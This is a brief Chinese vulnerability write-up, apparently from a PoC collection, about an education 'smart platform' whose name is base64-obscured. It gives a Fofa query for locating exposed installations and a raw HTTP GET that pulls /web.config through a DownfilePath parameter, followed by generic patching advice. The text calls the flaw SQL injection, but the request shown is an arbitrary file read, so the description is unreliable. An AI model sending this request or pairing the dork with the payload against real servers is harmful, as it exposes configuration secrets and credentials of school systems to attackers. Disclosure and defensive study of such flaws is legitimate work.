0x01 漏洞描述:
5pm65oWn5bmz5Y+w的目的为全面改革,智能化教育,智慧平台UGVyc29uYWxEYXlJbk91dFNjaG9vbERhdGE=存在SQL注入漏洞,攻击者可通过该漏洞获取数据敏感信息。
0x02 搜索语句:
Fofa:body="custom/blue/uimaker/easyui.css"
0x03 漏洞复现:
GET /ExpDownloadService.aspx?DownfilePath=/web.config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive
0x04 修复建议:
请及时更新系统和应用程序到最新版本。
限制应用程序和用户的权限,确保每个应用程序和用户只能访问其必需的最小权限资源